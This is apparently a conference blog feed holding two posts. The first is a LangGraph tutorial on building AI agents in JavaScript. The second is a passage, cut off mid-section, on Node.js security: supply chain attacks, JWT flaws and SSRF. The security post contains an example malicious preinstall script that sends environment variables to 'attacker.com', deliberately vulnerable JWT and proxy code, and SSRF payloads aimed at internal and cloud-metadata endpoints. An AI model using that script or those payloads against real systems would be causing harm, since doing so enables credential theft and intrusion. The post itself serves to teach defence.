International JavaScript Conference https://javascript-conference.com/ Wed, 17 Sep 2025 07:50:54 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 https://javascript-conference.com/wp-content/uploads/2017/03/ijs-favicon-64x64.png International JavaScript Conference https://javascript-conference.com/ 32 32 Build an AI Agent with JavaScript and LangGraph https://javascript-conference.com/blog/build-ai-agents-javascript-langgraph/ Wed, 17 Sep 2025 07:50:54 +0000 https://javascript-conference.com/?p=108401 Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
One thing in common between all the systems mentioned is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits–for example, preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library exists for both programming languages to implement AI applications in the form of chained modules. LangGraph, a library for modeling and implementing AI agents, comes from the same manufacturer. In this article, we use the JavaScript version of this library based on Node.js, which scores points with its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state contains information about the structure of the graph. It also stores the application’s variable data. The graph also has reducer functions that LangGraph can use to update the state.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way, but the model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('How late is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And how late is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

If the LLM receives a request that requires the current time to answer, it does not provide a direct answer, but informs the application that the ToolNode should be executed. In the example, the function can only be executed without receiving any additional parameters. However, you also have the option of defining parameters via the schema that the LLM passes on when called, and which you can access in the Tool function. This allows you to control the execution of this function and deliver a suitable result. It is important to define a description for the values in the schema using the describe method. The tool function does not yet create a node for LangGraph. To do this, you must pass the created object in an array to the constructor of the ToolNode class.

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.

Structure of the application graph

Figure 1: Structure of the application graph

The graphical representation reveals another special feature. You can use the addConditionalEdges method to insert a branch. Implement this in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a Tool call. If this is the case, the process is forwarded to the ToolNode. Otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a Tool node to counteract the weakness of LLMs that do not know anything about current or dynamic data. It also shows the essential features of a LangGraph application, but also the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model responds with a correct answer. The time you return here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich is suddenly in a time zone 6 hours behind UTC. In addition, during testing, the results for German queries were significantly worse than for the English version, even though all prompts were in German. To solve the time zone problem, you could, for example, register another tool that resolves the time zones correctly and uses this information to obtain the correct time. In the next example application, you will learn about another use case for LangChain that differs more significantly from the usual chatbot application.

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM to perform a very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application is designed to evaluate images of products and recognize which and how many products are depicted. The products are placed in the shopping cart and the price for the individual products and the entire shopping cart is determined. At the end, the application outputs a tabular list of the shopping cart. The application is based on Node.js and is operated via the command line. The product images are stored in the file system and are read in when used. Communication takes place via command-line input.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
type CartItem = StateType['cart'];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Visualization of GraphState

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. By formulating the prompt in this way, you have ensured that you will receive valid JSON as a response, which you can insert directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What 
            product do you see and how many are there. Answer in 
            the following json string structure 
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    const clonedState = { ...state };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

This is another simplification for our example. The CalculatePrice node reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but also significantly increases the response time in most cases.

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the Array-reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a simplification of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if you only specify the structure of part of the GraphState, LangGraph will only update that part. Here, another standard behavior of the library comes into play. If you do not define a reducer function when creating the GraphState, LangGraph will overwrite the value with the update. For a simple number, this behavior is not a problem. However, with an object structure such as the cart state, this can become a problem. Here, you can implement the desired behavior yourself using a reducer.

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application is terminated, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and draws from the GraphState. This node only accesses the state in read-only mode and outputs it unchanged as the return value. This node is also the end of the GraphState and is connected via an edge to the end node, which terminates the application.

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and enter the StateGraph. The graph of this application describes a circle. Here, you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only occurs if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To mitigate the restriction and increase the shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The connections between these nodes and the edges determine the flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application and pause your application if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move the implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition, validation, and TypeScript.

🔍 Frequently Asked Questions (FAQ)

1. What is LangGraph and how does it differ from LangChain?

LangGraph is a library for building AI agents using graph-based architecture in JavaScript or TypeScript. Unlike LangChain, which connects components in a linear chain, LangGraph uses nodes and edges to model dynamic control flows including branching and looping.

2. How do AI agents differ from traditional LLM-powered applications?

AI agents act autonomously within defined environments, continuously observe their surroundings, and make decisions based on long-term goals. This is in contrast to typical LLM applications, which respond only to direct prompts without proactive behavior.

3. What are the core components of a LangGraph application?

The three main components are nodes (functions that perform tasks), edges (transitions between nodes), and the state (a shared data object accessible and modifiable by all nodes). LangGraph also supports conditional logic via reducer functions and annotations.

4. Can LangGraph applications access real-time data?

Yes. LangGraph can integrate tools as nodes—for instance, a node that returns the current UTC date and time—allowing applications to supplement static model knowledge with dynamic, real-world data.

5. What role does the ToolNode play in a LangGraph setup?

The ToolNode provides real-time or auxiliary functionality by executing predefined logic, such as accessing current timestamps or running a custom function. It can be triggered by the model when a specific task cannot be completed with its internal knowledge alone.

6. How does LangGraph handle conditional logic and tool invocation?

LangGraph supports conditional edges via methods like addConditionalEdges. These allow the graph to evaluate conditions (e.g., tool calls in the model output) and dynamically choose which node to execute next.

5. How does the digital shopping cart example showcase LangGraph’s flexibility?

The digital shopping cart uses LangGraph nodes for reading product images, recognizing items via vision models, querying a database for prices, and calculating totals. This highlights how LangGraph enables stateful, multi-step applications beyond basic chatbot use cases.

6. Why is centralized state important in LangGraph applications?

Centralized state allows for easy debugging, flexible data exchange between nodes, and the ability to persist and resume sessions. This design makes LangGraph particularly suited for complex workflows that require memory and context retention across multiple steps.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection, NoSQL injection, to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only a part of it.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Problems with the JavaScript ecosystem are heavily dependent on dependencies. A typical Node.js project depends on hundreds of third-party packages, which is a huge attack surface that isn’t contained in your own code. This has been shown to be the case with recent supply chain attacks on popular npm packages. Not all security threats can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty is left to developers to ensure that they include security checks and measures in every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic and vulnerabilities are often uncovered and patched within widely used packages. This means that dependencies that aren’t regularly updated can put your application at risk of being exploited while the fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies

npm audit

# Fix vulnerable dependencies

npm audit fix

# For major version updates that npm audit fix can't automatically resolve

npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges

{

  "dependencies": {

    "express": "4.17.1",  // Good: exact version

    "lodash": "^4.17.20"  // Risky: accepts any 4.17.x version above 4.17.20

  }

}

//Use package-lock.json or npm shrinkwrap to lock all dependencies 

//Example using npm-package-integrity:




const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {

  if (results.compromised.length > 0) {

    console.error('Compromised packages detected:', results.compromised);

    process.exit(1);

  }

});

Dependency Confusion Attacks

Dependency confusion attacks occur when package managers download dependencies from both public and private registries and can result in the use of public packages when there are private packages with higher versions available. This can happen when there’s a private package name in the public registry with a higher version and the package manager could pull the public version.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you install the malicious package, npm will find the higher version in the public registry and install the package from the attacker.

Example Workflow:

  1. When you install a malicious package, the attacker might run a script when the package is installed.
// Malicious package preinstall script

// This runs automatically when the package is installed

const fs = require('fs');

const https = require('https');




// Stealing environment variables

const data = JSON.stringify({

  env: process.env,

  path: process.cwd()

});




// Sending data to attacker's server

const req = https.request({

  hostname: 'attacker.com',

  port: 443,

  path: '/collect',

  method: 'POST',

  headers: {'Content-Type': 'application/json'}

}, res => {});




req.write(data);

req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{

  "name": "my-project",

  "version": "1.0.0",

  "dependencies": {

    "@yourcompany/internal-package": "1.2.3"

  },

  "publishConfig": {

    "registry": "https://registry.yourcompany.com"

  }

}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, this can be done incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: None or insecure algorithms like HMAC with small keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Invalidating tokens that have not been signed, expired or targeted.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code

const secret = 'mysecretkey';

app.post('/login', (req, res) => {  

  // Create token with no expiration or audience validation

  const token = jwt.sign({ userId: user.id }, secret);

  res.json({ token });

});

app.get('/protected', (req, res) => {

  try {

    // No token validation or structure checks

    const token = req.headers.authorization.split(' ')[1];

    const decoded = jwt.verify(token, secret);

    
    // No additional checks on decoded token content

    res.json({ data: 'Protected resource' });

  } catch (error) {

    res.status(401).json({ error: 'Unauthorized' });

  }

});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Issue: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');

const fs = require('fs');

require('dotenv').config();




// Load JWT secret from environment variable

const secret = process.env.JWT_SECRET;

if (!secret || secret.length < 32) {

  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');

}




app.post('/login', async (req, res) => {

  // Create token with proper claims

  const token = jwt.sign(

    { 

      userId: user.id,

      role: user.role

    },

    secret,

    { 

      expiresIn: '1h',

      issuer: 'my-app',

      audience: 'my-api',

      notBefore: 0

    }

  ); 

  // Send token in HttpOnly cookie

  res.cookie('token', token, {

    httpOnly: true,

    secure: process.env.NODE_ENV === 'production',

    sameSite: 'strict',

    maxAge: 3600000 // 1 hour

  });

  

  res.json({ message: 'Authentication successful' });

});




app.get('/protected', (req, res) => {

  try {

    // Extract token from cookie (not from headers)

    const token = req.cookies.token;

    

    if (!token) {

      return res.status(401).json({ error: 'Authentication required' });

    }  

    // Verify token with all necessary options

    const decoded = jwt.verify(token, secret, {

      issuer: 'my-app',

      audience: 'my-api'

    })    

    // Additional validation

    if (decoded.role !== 'admin') {

      return res.status(403).json({ error: 'Insufficient permissions' });

    }  

    res.json({ data: 'Protected resource' });

  } catch (error) {

    if (error.name === 'TokenExpiredError') {

      return res.status(401).json({ error: 'Token expired' });

    }

    res.status(401).json({ error: 'Invalid token' });

  }

});

This above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT token is saved in an HttpOnly cookie with secure and SameSite=strict flags, making it immune to XSS and CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Side Request Forgery (SSRF) is a type of vulnerability where attackers can make servers make requests to unintended targets. This is problematic in the Node.js environment since HTTP requests are easy to make, especially with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');

const axios = require('axios');

const app = express();




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  try {

    // User can control the URL completely

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s see a secure way of the implementation:

const express = require('express');

const axios = require('axios');

const URL = require('url').URL;

const app = express();




// Define allowed domains

const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  

  try {

    // Validate URL format

    const parsedUrl = new URL(url);

    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {

      return res.status(403).json({ error: 'Domain not allowed' });

    } 

    // Proceed with request to allowed domain

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Then we check if the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.
  1. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // Downloads from any URL without validation

    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });

    const imageBuffer = Buffer.from(response.data);

    

    // Save to local storage

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
